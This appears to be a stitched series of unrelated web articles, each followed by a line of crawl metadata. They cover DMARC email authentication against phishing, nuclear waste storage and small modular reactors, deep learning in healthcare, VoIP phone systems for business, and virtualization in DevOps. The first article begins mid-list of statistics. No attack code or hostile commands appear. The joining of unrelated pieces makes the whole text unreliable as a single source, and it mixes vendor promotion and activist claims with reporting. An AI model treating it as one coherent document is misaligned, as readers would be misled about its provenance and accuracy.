- The 2021 Data Breach Investigations Report by Verizon states that 96% of phishing attacks occur through emails.
- A CISCO report says that one person clicked a phishing link in 86% of organizations. Besides, phishing accounts for nearly 90% of data breaches.
- Symantec Research notes that 1 in every 4200 emails in 2020 was a phishing email.
What is DMARC?
So, what is DMARC, and what does DMARC stand for? DMARC is the abbreviation for ‘Domain-Based Message Authentication Reporting and Conformance’. DMARC is an email authentication and security protocol that protects a business organization’s email domain from being misused by malicious actors for phishing scams, email spoofing, getting access to sensitive information, and other cybercrimes. While working in conjunction with existing email authentication techniques, Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM), DMARC, all these protocols make it more secure by adding a critical function, namely reporting.
DMARC is useful to protect your email domains against cyber threats like phishing or spoofing. Publishing a DMARC record into the DNS provides the domain owner insight into who sends email on their domain’s behalf. As it allows for detailed information about the email channel, the domain holder has complete control over the domain. Thus, you can ensure that your customers and email recipients receive emails sent on your behalf without fail. Besides, it confirms the authenticity of the email source sent from the domain. It also prevents others from sending any email using your name.
DMARC – A Brief History
Having understood the DMARC definition, here is brief background information on how DMARC originated and gradually developed into an internationally accepted email authentication standard.
The DMARC standard was initially introduced in 2012 to prevent email abuse. PayPal joined Google, Microsoft, and Yahoo to create DMARC using existing email authentication protocols like SPF and DKIM. DMARC was initially conceived as an email security protocol and adopted by security experts in the financial industry.
Since its introduction, other industrial sectors have also gradually accepted that DMARC is an email authentication standard. In addition, email marketers consider DMARC a critical aspect of online security because it improves deliverability. Today, almost all the major ISP companies support DMARC for its value, and it is awaiting approval as an open standard protocol from IETF (Internet Engineering Task Force).
Why is DMARC Required?
Statista reports the existence of more than four billion email users globally. This number is increasing and could reach 4.6 billion by 2025. While email provides convenience, it has also made it easier for threat actors to perpetrate their malicious deeds. DMARC is necessary to prevent these malicious actors from using the email channel to introduce malware and carry out phishing scams.
Besides providing a complete insight into email channels, DMARC makes it easy for users to identify spoofing attempts and phishing attacks. This email authentication protocol can reduce phishing attacks, prevent malware and spoofing, and protect against BEC, brand abuse, and other email-based cyberattacks.
Here are some more statistics to support DMARC deployment.
- FBI Internet Crime 2020 report states that Business Email Compromise (BEC) attacks caused losses worth $1.8 billion in 2020. The report also highlights email as the primary channel for spreading ransomware. In addition, phishing incidents have increased by 110%.
- CISCO 2021 report indicates that 80% of the global email traffic is spam.
- Verizon 2020 Report points out social engineering attacks as the prime cause of 22% of data breaches.
- The Europol 2019 Report identifies that phishing is involved in 78% of cyberespionage incidents.
- The Sonic Wall Report 2021 highlights that Microsoft Office files comprised 67% of malicious files used in email phishing scams in 2020.
How Can DMARC Help?
Adversaries send phishing emails by impersonating genuine domains. The target acts on the email message, assuming it originated from an authentic source. In the process, the network systems of business organizations get compromised. DMARC can help because it enables domains to gain insight into their email channels. Thus, business organizations find it helpful to deploy and enforce a robust authentication policy.
When domain owners enforce the DMARC policy ‘p=reject,’ organizations get protection against the following cybercrimes.
- Phishing attempts on the organization’s customers
- Ransomware and other malware attacks
- BEC, spear phishing, and CEO frauds
Usually, organizations try to gain insights into their email channels after a threat actor has made a phishing attempt. However, DMARC protection ensures these business entities and domain owners complete insight into their email channels much earlier. Thus, it enables organizations to alert their customers well in advance about the possibilities of spoofing, phishing, or other cyberattacks.
How Does DMARC Work?
One of the classic examples of a phishing scam is in the banking sector. Malicious actors spoof banking website domains and send emails on the bank’s behalf to customers stating that their card/account has been deactivated. It asks the customer to revalidate specific personal details to activate the account. Customers get fooled into thinking it is a genuine email and act on it accordingly in full faith. As they click on the website link provided in the email, they reach a fraudulent website resembling their bank’s landing page. Subsequently, the customers log in to their internet banking accounts using their credentials and allow the threat actors to steal their personal information.
To protect internet domains from such scams, users used email authentication techniques like SPF and DKIM earlier. However, the perpetrators have become more sophisticated enough to bypass these security measures comfortably. In such a circumstance, DMARC can protect customers by creating a link between SPF and DKIM. Publishing DMARC in your DNS record lets you gain insight into your email channel. For example, DMARC generates RUA (Aggregate), and RUF (Forensic) reports daily. These reports are sent to your registered email address published in your DMARC record.
RUA DMARC reports have the following characteristics.
- They are sent daily and provide a complete overview of all email traffic.
- This report offers a comprehensive list of all IP addresses that have attempted to transmit email messages to a receiver using your domain credentials.
RUF DMARC reports are different from RUA reports in the following manner.
- These reports are sent on a real-time basis and for failures alone.
- They mention the original message headers and may include the original message.
DMARC service providers offer a user-friendly dashboard for monitoring and analyzing your, DKIM, SPF, and DMARC reports. DMARC works on three DMARC policies to enable you to decide what happens to your emails.
- The ‘None‘ Policy collects data and monitors your current email channel.
- The ‘Quarantine‘ Policy delivers malicious emails into the receiver’s spam or junk email folder.
- The ‘Reject‘ Policy ensures that the email is not delivered to the receiver.
In this way, DMARC secures your domain and gives you the discretion to decide the course of action it should take when the ISP servers receive malicious emails. DMARC is a powerful tool to help secure your email domain if used correctly. It needs proper configuration because a ‘Quarantine’ or ‘Reject’ policy can lead to many false positives. Therefore, it is better to check up with your DMARC service provider about the correct setup to secure your email channel.
The Spoofing Example
The above sections showed how DMARC works to secure your emails. It instructs email receivers what action to take on incoming emails, especially those that fail DMARC checks. At the outset, the email receivers verify whether the incoming messages possess valid SPF records and DKIM records and have proper SPF and DKIM alignment with the sending domain. Then, it helps check whether the messages are DMARC-compliant or DMARC-failed. The defined DMARC policy takes over upon verifying the authentication status to handle the email accordingly.
Three DMARC policies have been discussed above already. The simple example presented below shows what they signify and how they help DMARC mitigate the impact of spoofing.
- Monitoring Policy: p=none
The ‘p=none’ monitoring policy gives insight into the email channel by instructing the email receivers to send the respective DMARC reports to the address published in the DMARC Record. However, it does not recommend the email receivers treat these messages differently even if they fail DMARC checks. Therefore, this policy does not affect the deliverability of the email. In other words, the policy results in delivering all messages, whether genuine or not.
- Quarantine Policy: p=quarantine
The Quarantine policy is definitive because it instructs the email receivers on how to act if the email message fails or passes DMARC checks. If the message passes DMARC checks, this policy asks the receivers to deliver the emails into the primary inbox of the receiver. On the other hand, if the message fails DMARC checks, it specifies that it should get forwarded to the receiver’s spam folder. As a result, the quarantine policy mitigates the spoofing impact but delivers it to the spam folder. If required, the receiver can open the email from the spam folder or delete it. Thus, it partially affects the email’s deliverability as the message is treated as spam.
- Reject Policy: p=reject
The Reject policy is authoritative because it provides clear instructions to email receivers to reject all emails that fail DMARC checks. As a result, the receiver’s inbox receives only those emails passing the DMARC authentication check. The DMARC failed emails do not land in the receiver’s inbox. Besides, it ensures deletion of these incorrectly set up emails (also referred to as spoofing emails) to mitigate spoofing entirely. Unlike the previous policy, you cannot find such emails even in the spam folder.
Overriding DMARC: An Important Point to Note
One should note that a DMARC record instructs handling emails according to the DMARC policy. However, email receivers are not obligated to follow the DMARC policy strictly. Instead, they can use their policy and decide accordingly. For instance, suppose the email receiver judges the email as legitimate. In that case, they can apply their local policy and deliver the message to the receiver’s inbox even if it fails DMARC checks. In addition, the email receiver’s local policies can be set to override the DMARC ‘p=reject’ policy.
DMARC – Common Misunderstandings
By now, it must be clear what is a DMARC policy, what DMARC stands for, and how DMARC works. Organizations can mitigate spoofing and phishing attacks, block malware, and increase email deliverability using DMARC records. However, while it is a powerful tool, DMARC has caused certain misunderstandings. Below is an examination of a few of the most common misconceptions and their clarification.
Misunderstanding 1: DMARC is a quick-fix solution.
Contrary to what many people believe, DMARC does not guarantee the complete security of your email channel. It certainly improves email deliverability, but email servers can formulate their local policies and allow them to override DMARC policies. However, internet service providers adopting DMARC policies are more likely to ensure that your emails land in the receiver’s primary inbox. Thus, even when DMARC provides many benefits, placing and enforcing a DMARC record is not a quick-fix solution for email deliverability.
Misunderstanding 2: Immediately enforcing a ‘p=reject’ policy is the right solution.
Generally, organizations follow a knee-jerk reaction on encountering a phishing attack on their behalf. They lock down their email channel by placing a DMARC record and immediately enforcing a 100% ‘p=reject’ policy. While it seems to be an effective way to block phishing attacks instantly, it has its downsides. Some of your legitimate emails can also get lost under such circumstances.
DMARC analyzing service providers have noted that organizations never have a 100% compliance rate in most cases when they start with DMARC. Therefore, the consensus is that organizations should initially begin with a ‘p=none’ policy and monitor each email through the reports submitted by DMARC services. It helps improve SPF and DKIM authentication. This process can take one month to a year, depending on the organizational email environment.
Subsequently, the organization can go for a ‘p=reject’ policy. Applying the p=quarantine’ rule is even better before going for the ‘reject’ policy if you are patient enough and ready to wait some more time. In that case, the messages marked as failed will not get directly rejected. The system will move them to a different section where you can still verify them and take them back if they are falsely marked as failed. Immediately enforcing the ‘p=reject’ policy is not a sound decision.
Misunderstanding 3: DMARC protects all inbound email streams.
Though DMARC primarily works on the outbound email channel component, it does not necessarily mean that all inbound stream is unaffected. The effect can spill over, with DMARC influencing a small part of the inbound email channel. For example, emails sent to colleagues are affected by DMARC. These emails are outbound emails for the server, but they remain inbound for the network. Therefore, DMARC does influence these emails.
Benefits of an Effective DMARC Policy
Having an effective DMARC policy setup is beneficial to organizations in many ways, as listed below.
- It helps mitigate email-based cyber threats and gives a complete insight into the email channels. In addition, an effective DMARC policy provides perfect security and disallows malicious actors’ unauthorized use of your email domain.
- It provides organizations with enhanced visibility of who and what is using your email domain to send emails across the internet.
- It improves email deliverability and, thus, enhances organizational reputation.
- It improves your identity across a massively growing footprint of DMARC-capable receivers.
- By uplifting the organization’s reputation, it provides the customer with an enhanced user experience.
Traits to Look Out For in a DMARC Analyzing Software Solution
ISPs and domain service providers should have an effective DMARC policy to prevent spamming directed to your customers and cyberattacks originating through emails employing spoofing and phishing of emails and websites. Here are the traits one should look for in a DMARC analyzing software solution.
- The platform should be user-friendly and guide you perfectly towards a ‘p=reject’ policy in the quickest manner possible without bypassing or ignoring any email authentication standard.
- It should provide an effective SaaS solution that empowers organizations to manage complex DMARC deployment comfortably.
- The solution should provide 360-degree visibility and governance across all email channels.
- The entire DMARC implementation and usage procedure should be as easy as possible.
The internet has become an integral constituent of human life, and email correspondence has increased manifold. While convenient, it opens up opportunities for malicious actors to have a free hand at email spoofing directed at unsuspecting targets intending to infiltrate information systems and cause reputational and financial loss to the organization. Email channels are the most vulnerable in any network system.
Therefore, organizations and domain service providers should ensure protection from phishing attacks to reduce cybercrime incidents significantly. Email authentication protocols like SPF, DKIM, and DMARC can prove handy in such circumstances. The information on DMARC provided in this article in detail will help all organizations to deploy the solution quickly to combat email-based cyber threats. | <urn:uuid:3797136f-6cf5-4f4c-91f3-e866ec1acbff> | CC-MAIN-2022-40 | https://dmarcreport.com/what-is-dmarc/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00495.warc.gz | en | 0.915472 | 3,539 | 2.90625 | 3 |
There is no issue more polarizing regarding the subject of nuclear power than nuclear waste and what to do with it.
The United States has 103 nuclear power reactors at 65 plants in 31 states. Thousands of tons of radioactive commercial spent fuel are permanently stored at these reactor sites, the U.S. Government Accountability Office reports — about 74 percent of it in pools of water, with the remainder in dry storage casks.
Part One of this three-part series described a new generation of small modular reactor designs; Part Two examined the economics. The questions now are, can existing nuclear waste be managed safely — and do new, smaller reactors offer any hope in this regard?
‘Indefinitely and Safely’
The solution to the waste generated by nuclear power plants is ultimately a government policy decision, Greg Ashley, president of Bechtel‘s nuclear business line, told TechNewsWorld.
“Other countries have demonstrated that the entire nuclear fuel cycle can be safely and economically managed,” Ashley explained. “We are optimistic that the U.S. will also enact policy and regulation that supports management of the nuclear fuel cycle.”
NuScale Power, which was established solely for the deployment and commercialization of Small Modular Reactor technology, does not address the issue of used nuclear fuel, said Mike McGough, the company’s chief commercial officer.
“Like the other proposed SMR designs and all other operating nuclear power plants, we will generate a very small quantity of used nuclear fuel, which can be stored indefinitely and safely at the plant site, as is done today, until such time that recycling is permitted or a permanent repository is established,” McGough told TechNewsWorld.
‘Nuclear Power Has Failed Humanity’
Others aren’t so sure — particularly about the “safety” part.
“Small Modular Reactor designs will still create tons and tons of radioactive waste for which there is no solution, and never will be,” asserted Ace Hoffman, an anti-nuclear power plant activist and author of The Code Killers: Why DNA and ionizing radiation are a dangerous mix.
“There are several thousand dry casks scattered around the country, just waiting to be breached,” Hoffman told TechNewsWorld. “There are over one hundred spent fuel pools. One percent of this problem would still be a huge problem.
“Nuclear power has failed humanity and continues to do so,” Hoffman added. “There is no such thing as clean nuclear power and never will be. It is physically impossible to make this process safe and clean.”
Unstable Uranium Isotopes
The Earth’s store of the element uranium was produced in one or more supernovae explosions in the Milky Way galaxy more than 6 billion years ago.
In 1789, the element was identified and named by German chemist Martin Klaproth. The term “uranium” was derived from the name Uranus, the sun’s seventh planet.
Uranium, the heaviest naturally occurring element on earth, is also the planet’s deadliest metal. Radioactive uranium wastes consist of particles that, if they escape into the environment and enter the human body, can destroy cells and cause birth defects and cancers.
To wit: “Spent nuclear fuel, the used fuel removed from nuclear reactors, is one of the most hazardous substances created by humans,” notes a GAO report from last year.
Given that the United States has no permanent disposal site for the nearly 80,000 tons of spent fuel from U.S. reactors, according to the GAO, that’s a scary problem.
All that deadly waste was intended to go to Yucca Mountain, a volcanic range in Nevada, northwest of Las Vegas.
Until federal funding ended in 2010, the Yucca Mountain Nuclear Waste Repository was to be a deep geological repository storage facility for spent nuclear reactor fuel and other high level radioactive waste.
Unfortunately — or fortunately, depending on your perspective — Yucca Mountain sits on an aquifer and in an earthquake zone, so it has been deemed too dangerous a place to store radioactive waste.
In examining other centralized storage or permanent disposal options, the GAO found that new facilities may take from 15 to 40 years before they are ready to begin accepting spent fuel. This situation will likely more than double the amount of spent fuel stored at nuclear power plants to more than 150,000 tons before it can be moved offsite.
In the meantime, spent nuclear fuel remains onsite at the nuclear power plants where it is generated, collectively accumulating at commercial nuclear reactors an additional 2,200 tons per year.
Even if an alternative to Yucca Mountain were ever opened, though, it would be highly unlikely that deadly radioactive waste would ever be removed from the nuclear power plant sites.
After all, the spent fuel can’t be moved by truck or train — “Mobile Chernobyls” headed down “Fukushima Freeways” — without risking accidents that would permanently destroy huge areas. Since it would require decades of 24/7/365 transport to move the stuff, the odds in favor of even a single devastating accident are very high.
Pre-Deployed Nuclear Weapons’
Eventually, all nuclear power plants’ spent fuel rods will be moved over from cooling pools into the dry casks, where they will sit forever. Every 80 or 100 years or so, someone will have to somehow take the highly radioactive, dried-out reactor cores and transfer them to new dry casks.
“Nuclear reactors and the waste stored on the site are effectively pre-deployed nuclear weapons in the event that malicious people decide to blow one up,” notes the Nuclear Information and Resource Service in the No. 1 spot on its “Top 11 Reasons to Oppose Nuclear Power” list.
“Building more reactors simply increases the number of targets, or if added to an existing site, makes that target bigger,” the list explains. “Chernobyl is an example of a reactor being blown up. Until Fukushima, it was the largest single release of radioactivity to date, exceeding all nuclear weapons tests (combined).”
Besides cooling, casking or burying the stuff, the nuclear energy industry thinks it has a possible remedy for dealing with spent fuel: nuclear waste-burning reactors that supposedly could extract large quantities of energy from nuclear waste while eliminating it in the process.
An option for nuclear waste disposal includes converting the plutonium into mixed-oxide fuel, also known as “MOX” — a plutonium-uranium blend for use in conventional nuclear reactors.
Critics, however, worry about the risk of nuclear proliferation that could result from encouraging increased separation of plutonium from spent fuel in the civil nuclear fuel cycle.
GE-Hitachi’s PRISM reactor, on the other hand, offers a different alternative.
Specifically, its PRISM fast reactor uses a completely different design — fueled by plutonium and cooled by liquid sodium — that offers a viable solution, the company says.
Based on a sodium-cooled technology that generates more fissile material than it consumes, PRISM is also part of GE-Hitachi’s Advanced Recycling Center proposition to the U.S. Congress to deal with nuclear waste.
PRISM is a so-called “fast reactor” because it uses liquid sodium, rather than water, to cool the reactor. The sodium allows the neutrons to maintain higher energies and to cause fission in elements such as plutonium more efficiently than water-cooled reactors do.
PRISM incorporates “passive safety” features and, if necessary, can shut down automatically. PRISM would not require any automatic systems, valves or operators to remove reactor heat after a shutdown involving a complete loss of electrical power.
The PRISM reactor purportedly disposes of a great majority of the plutonium itself, as opposed to simply reusing it over again without ever actually ridding the planet of the substance.
Hoffman, not surprisingly, isn’t convinced.
“MOX fuel has been tried and abandoned lots of times,” he said. “That GE-Hitachi ‘fast’ reactor will be beset with problems, including generating more radioactive trash, because that’s what you get when you split atoms for energy.”
Lethal to the Human Soft Machine
Why is spent fuel so dangerous?
Certain changes take place in the ceramic U-235 fuel pellets during their time in the reactor of the nuclear power plant. The particles left over after the atom has split are radioactive.
During the life of the fuel, these radioactive particles collect within the fuel pellets. The fuel remains in the reactor until trapped fission fragments begin to reduce the efficiency of the chain reaction.
Some of the fission products include various isotopes of strontium, cesium and iodine. The spent fuel also contains plutonium and uranium that was not used up. The fission products and the leftover plutonium and uranium remain within the spent fuel when it is removed from the reactor.
This material is called “high level waste” because it is extremely hot, very radioactive and very deadly.
‘Radiation Damages Our DNA’
Radioactive elements can contaminate the body’s cells either environmentally via gamma radiation or through inhalation and ingestion. It affects the chromosomes within tissue cells, but the injury to the body is caused primarily by interfering with cell biology and breaking apart molecules.
By far, the most vulnerable tissues are bone marrow and the lymph nodes. The body has very efficient mechanisms for capturing iodine and concentrating it in the thyroid gland, for directing calcium and other bone-seeking elements to the skeleton and holding them there, and for concentrating other elements at specific points.
Consequently, the full destructive force of a radioactive material may focus on a single organ.
Iodine-131 poses a special health risk because of its cancer-causing effect on the thyroid gland. Strontium-90 is a “bone seeker” that exhibits biochemical behavior similar to calcium. Cesium-137, on the other hand, mimics potassium and is absorbed through the walls of the intestine into the bloodstream or lymphatic system.
“Radiation damages our DNA and leads to cancer and many other ailments,” explained Hoffman.
“Banning the bomb isn’t enough — and we haven’t even done that yet,” he concluded. “We need to ban the reactors, too. None of their safety designs are of much use against any truly destructive forces that might come along, be it terrorists, rust, human error, asteroid impacts, solar storms, war or Mother Nature.” | <urn:uuid:c27041be-82d7-4748-a4c5-0826555ba82b> | CC-MAIN-2022-40 | https://www.crmbuyer.com/story/nuclear-power-part-3-radioactive-waste-78324.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00495.warc.gz | en | 0.931703 | 2,273 | 3.0625 | 3 |
While there are some sectors of the tech-driven economy that thrive on rapid adoption on new innovations, other areas become rooted in traditional approaches due to regulatory and other constraints. Despite great advances toward precision medicine goals, the healthcare industry, like other important segments of the economy, is tied by several specific bounds that make it slower to adapt to potentially higher performing tools and techniques.
Although deep learning is nothing new, its application set is expanding. There is promise for the more mature variants of traditional deep learning (convolutional and recurrent neural networks are the prime example) to morph into domain-specific tools to bolster healthcare capabilities in new ways. Of course, this is not without a set of challenges, which we will get to in a moment.
Over the last year deep learning moved from its anchors in video, image, and speech recognition and analysis for more commercial-geared applications into an increasing array of scientific fields. In healthcare, deep learning is expected to extend its roots into medical imaging, sensor-driven analysis, translational bioinformatics, public health policy development, and beyond.
As a group of researchers analyzed the state of deep learning in health informatics, noting “rapid improvements in computational power, fast data storage, and parallelization have contributed to the rapid uptake of deep learning in addition to its predictive power and ability to generate automatically optimized high-level features and semantic interpretation from the input data.” In addition to tracking the significant jump in the number of peer reviewed publications about the use of deep learning in healthcare, they further tracked the evolution of deep learning approaches.
“In domains such as health informatics, the generation of this automatic feature set without human intervention has many advantages. For instance, in medical imaging, it can generate features that are more sophisticated and difficult to elaborate in descriptive means. Implicit features could determine fibroids and polyps, and characterize irregularities in tissue morphology such as tumors.”
Further, they note that “in transformational bioinformatics, such features may also determine nucleotide sequences that could bind DNA or RNA strands to a protein.” Other areas extending as far as public health monitoring can leverage deep learning to capture data for macro trends based on regions and populations, for example.
While there are promises of a bright future for deep learning in health informatics, there are certainly challenges and a health degree of skepticism about how fully and when deep learning will be a full fit in the wide-ranging area is necessary.
“Despite some recent work on visualizing high level features by using weight features in a convolutional neural network, the entire deep learning model is often not interpretable,” the researchers note. “Consequently, most researchers use these approaches as a black box without the possibility to explain why it provides good results, or without the ability to apply modifications in the case of misclassification issues.” This black box problem is compounded by the fact that neural networks can be tricked (although not necessarily on purpose).
“Patient and clinical data is costly to obtain and healthy control individuals represent a large fraction of a standard health dataset. Deep learning algorithms have mostly been employed in applications where the datasets were balanced, or, as a work-around, in which synthetic data was added to achieve equity. The latter solution entails a further issue as regards the reliance of the fabricated samples.”
As the team explains via an example, “it is possible to add small changes to the input sample (such as imperceptible noise in an image) to cause samples to be misclassified” but of course, any machine learning approach can suffer the same problems. On the flip side, it is also possible to “obtain meaningless synthetic samples that are strongly classified into classes even though they should not have been classified. This is also a genuine limitation of the deep learning paradigm, but it is also a drawback for other machine learning algorithms as well.”
“Deep learning predominantly requires large amounts of training data. Such a requirement makes the classical barriers to entry associated with machine learning (data availability, privacy) more critical.”
Training neural networks of any type requires a great deal of data, and that is just to allow them to recognize known features. “Not all applications, particularly rare diseases or events, are well-suited to deep learning,” the researchers note, explaining that the problem of “overfitting” (which leads to an inability for the neural net to make suitable generalizations) is still a problem.
The problems cited for deep learning in healthcare are similar in other areas, particularly in terms of the black box problem, overfitting, and reliability. However, this review does provide in-depth insight about what areas might benefit from implementing machine learning even if there is some maturation of the space required. | <urn:uuid:fb769d5d-42d8-4cac-b42f-caf2f3600ebb> | CC-MAIN-2022-40 | https://www.nextplatform.com/2017/01/09/road-ahead-deep-learning-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00495.warc.gz | en | 0.948411 | 991 | 2.765625 | 3 |
VoIP, also known as Internet telephony or ‘voice over IP’, is a way of making phone calls without using a traditional analogue phone line. It stands for ‘Voice over Internet Protocol’ and, as the name may suggest, it’s the system of making a phone call over the Internet rather than using a landline or mobile network. This system works by using voice signals and turning them into digital signals, then using your broadband line to send them as data – essentially the same concept of speaking to someone in another location, but via the Internet. So if it’s such a similar idea, just why is VoIP becoming such a big player for business across the world?
There are many benefits of using VoIP. It’s cheaper than normal phone lines once it has been set up, and could even mean that you pay nothing at all when you make a phone call – though this depends on the distance and which country you're calling. In some cases, you can spend hours on a telephone conference for free!
VoIP does more than increase savings by lowering costs though. Here’s why so many businesses are ditching their analogue lines in favour of VoIP:
Access via a smartphone
No longer is it a requirement to be in the office to connect to your phone system. You can receive calls to your business or DDI on your smartphone. You can access the office directory and make and receive calls as if you were in the office via the VoIP system app installed on your mobile.
You can access VoIP via a smartphone through one of two ways. Firstly, you can use an app that allows you to make calls such as Skype, FaceTime, WhatsApp, Facebook messenger and many more. This is one of the easiest ways to use VoIP. If the person you are calling has the app and an access to the Internet then it's free and easy to use.
You can also use VoIP on your smartphone from your landline provider. You can make calls that use the minutes from your plan, which is a benefit if you have certain deals such as cheap international calling. Landline providers such as BT and TalkTalk both have popular services.
Improve and upgrade functionality
For as little as £3 per month per user you could replace your existing business phone system and get a new VoIP system. The features of a VoIP system allow you to have voicemail, call waiting, hunt groups, all easily managed via an online portal e.g. Broadcloud.
Access on your computer
Make and receive voice and video calls as if you were in the office from your laptop, iPad, tablet or home PC. A VoIP system exists wherever you work and gives you all of the functions you may need remotely. It is also easy to send and receive faxes too. Calling a landline or mobile will be routed through your office minutes contract.
Your number follows you wherever you go
Now you can get your call routed to your desk, your mobile or the office you choose to work from wherever that may be. Calls are intelligently sent to your available location. Now you don't miss any important calls or return to the office to a ton of voicemails.
Integrate other office systems with your VoIP system
CRM, desktop support, email, all link into your VoIP system so it is much easier to access contacts and respond to the important issues that you are faced with during the working day.
So what will you need to make VoIP work for you? It depends on the method of VoIP that you’re going to use. Firstly you will need a broadband connection, preferably a fibre optic one is best as they are more reliable. You’ll ideally want an unlimited plan so you will be able to have the freedom to talk as long as you want to. To get the best VoIP experience you will need a full FTTP or an Ethernet connection, which are available with some business broadband providers. Search for a business broadband VoIP connection here.
If you want to use a VoIP system you will need to purchase the licenses from a VoIP provider and, if you don’t already have one, a compatible phone. If the phone plugs into an Ethernet network then make sure that your router is compatible too.
To use VoIP with your computer it's probably a good start to have a laptop or desktop computer that is able to connect to the Internet. You will also need a working set of headphones or speakers and a microphone. You may consider getting a headset for the highest quality, but it’s not essential – as long as they can hear you, you’ll be off to a good start. For most providers you will have no option but to keep your landline, as you will need line rental to receive broadband.
VoIP is taking the business world by storm due to the financial savings that it can make against the costs of normal landlines, as well as the higher quality calls that can be made and the consistency of the service when lots of other people in the office are also on the phone. Slow Internet will mean low quality calls, but generally business Internet is improving and if you have fibrotic, you will be fine. In some cases, you will be able to keep your phone number – it depends on the provider if they can swap it over. In some cases, you won't even need a number. The cost also depends on your setup. App to app is mostly free, and those provided by a business will come with a monthly cost.
If businesses keep taking up VoIP plans at such a rapid rate, it’s likely analogue phone lines could soon be a thing of the past. If your business has not yet begun making the switch to VoIP, now is the time to upgrade and make sure you and your business doesn’t get left behind.
Nathan Hill-Haimes, founder, Amvia (opens in new tab)
Image Credit: Everything Possible / Shutterstock | <urn:uuid:bdade7ef-0db4-4ba5-8a57-2dccc24171f5> | CC-MAIN-2022-40 | https://www.itproportal.com/features/why-voip-has-become-such-a-major-player-for-businesses/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00495.warc.gz | en | 0.961008 | 1,238 | 2.71875 | 3 |
The primary pursuit of DevOps structuring and systems is to improve the speed and quality of the software development process. DevOps looks to achieve the simultaneous increase in both quality and rate of deployments by emphasizing the importance of collaboration and promoting transparency through the use of tools that empower communication and data transparency. DevOps teams are made of cross-discipline members that bring their unique skill sets and diverse perspectives to bear to increase the team’s ability to tackle their projects quickly and efficiently.
Aside from an emphasis on communication and teamwork, DevOps also looks for technologies aiding in powering up the software development life cycle (SDLC). Tools like the cloud and automation are leveraged to their fullest extent to provide DevOps teams with every advantage possible to help them in delivering on the continuous integration and continuous delivery (CI/CD) goals of the enterprise. Any piece of tech that alleviates pressure from the team and optimizes the hours they spend on each task is a valuable asset for the organization to employ.
Another such tool that helps to ensure rapid and stable deployments occur on a regular basis is virtualization.
(This article is part of our DevOps Guide. Use the right-hand menu to navigate.)
Basics of Virtualization
Virtualization is the process of creating software that mimics various hardware and software environments without having to change out the physical hardware itself. Virtualization techniques create abstractions of physical hardware components to create aggregated pools of resources made up of CPUs, memory, storage, networking, and applications among other components. Essentially, a virtual machine (VM) functions as a simulation of specific IT hardware and software configurations without requiring the physical components to be interchanged. This allows a single piece of hardware to host to numerous VM configurations simultaneously. Virtualization is not a new concept. In fact, the utilization of virtualization techniques dates back to as early as the late 1960s.
Virtualization has come a long way since its first inception, but the core concept remains the same – achieve more computing capabilities with fewer resources and running multiple, independent systems simultaneously on a single machine. Today’s VMs are much more complex and capable of quickly scaling up or down to meet resource requirements on demand thanks, in part, to leveraging cloud technology in addition to virtual machine techniques. The power of modern VMs allows engineers to create environments that are virtually identical to real-world hardware configurations with software running within the VM environment.
This is especially important in today’s world where computers have become incredibly complex and diverse thanks to the proliferation of various operating systems, hardware manufacturers, and the vast array of mobile devices that see regular use across the globe. As computers have continued to increase in capabilities, complexity, and diversity, creating software that runs on these various devices also grows in complexity. These factors have created a situation in which creating and testing software for the various devices that software will eventually be utilized on is a daunting if not impossible task without leveraging the power of virtualization.
Different Types of Virtualization
There are three primary types of virtualization: server virtualization, network virtualization, and desktop virtualization.
Server virtualization enables a single physical server to run multiple operating systems at once. This creates a more efficient server providing reduced operating costs, increased performance, and faster workload capacity all while reducing physical server complexity.
Network virtualization reproduces physical networks in a virtual environment which allows applications to run on the simulated network in the same way they would on a physical one. Virtual networks provide enhanced operational benefits compared to their physical counterparts and do so at reduced costs.
Desktop virtualization mimics the environment and settings of an instance of a desktop and the applications hosted on the device. This allows users to access enterprise resources from off-site or even from devices that would otherwise be incapable of running the hosted services. This technology allows users to leverage the processing power of more advanced machines from standard or even mobile devices – providing them with the capabilities they need to get their work done on the go.
The applications for the various forms of virtualization are numerous, but the primary benefit they all provide is the ability to access and leverage resources that would otherwise be prohibitively expensive, if not altogether impossible. Virtualization is a powerful tool with various applications for enterprises of all sizes, but it has specific uses for organizations that utilize DevOps systems.
How Virtualization and DevOps Work Together
As was mentioned above, DevOps seeks to optimize the development, testing, and deployment processes of software development through the use of collaboration and cutting-edge technologies. Virtualization enables DevOps teams to develop and test within simulated environments that run the full gamut of devices available to consumers while also testing deployment on virtual live environments. This enables development to occur alongside real-time testing of how the changes will impact the entire system. This level of accuracy in testing makes for vastly reduced deployment times and increased stability.
Containerization, another popular technology DevOps teams are adding to their toolkits, is essentially the process of taking virtualization one step further by utilizing operating system (OS) kernels to run multiple applications within a single container. Containerization furthers the concept of virtualization by not only providing a digital configuration that mimics hardware setups but also mimics the OS and libraries that encompass the entire runtime environment.
Doing this allows DevOps teams to build, test, and deploy their software solutions within live simulated environments and doing so while using vastly reduced computing resources. This results in DevOps teams being able to achieve more with less. Continuous deployment is achievable through the flexibility of virtualization and containerization technologies that allow updates to be tested and deployed on multiple servers with enhanced stability and consistency. Virtualization and containerization both play large roles in the maximization of enterprise resources to ensure development resources are optimally leveraged at each stage of the DevOps process.
DevOps: Solutions for You
If DevOps sounds like a good fit for your organization’s needs but you want to make sure you get it right the first time or you’re struggling with your current DevOps implementation, BMC is the IT solution partner you need. Read more about how automation and DevOps systems can help increase the rate at which you deploy products with BMC’s free eBook: Automate Cloud and DevOps Initiatives. Read about how to make the most of your cloud and enterprise resource investments in the eBook: Five Steps for Successfully Managing Cloud Costs.
BMC expert consultants are available to work with you to bring their knowledge and expertise to your organization. BMC provides custom-tailored Deployment Services for your organization to tackle the unique challenges you face. When partnering with BMC, you get:
- Faster service delivery: Agile releases that keep up with rapid demand
- Visibility across data: Ensure compliance and data accuracy
- Cost-effective service: Increased productivity and performance
- Experienced DevOps professionals: Equip you with the tools you need for success
- Conversion or upgrade: Seamless modernization or total replacement
- All tailored for the specific needs of your organization.
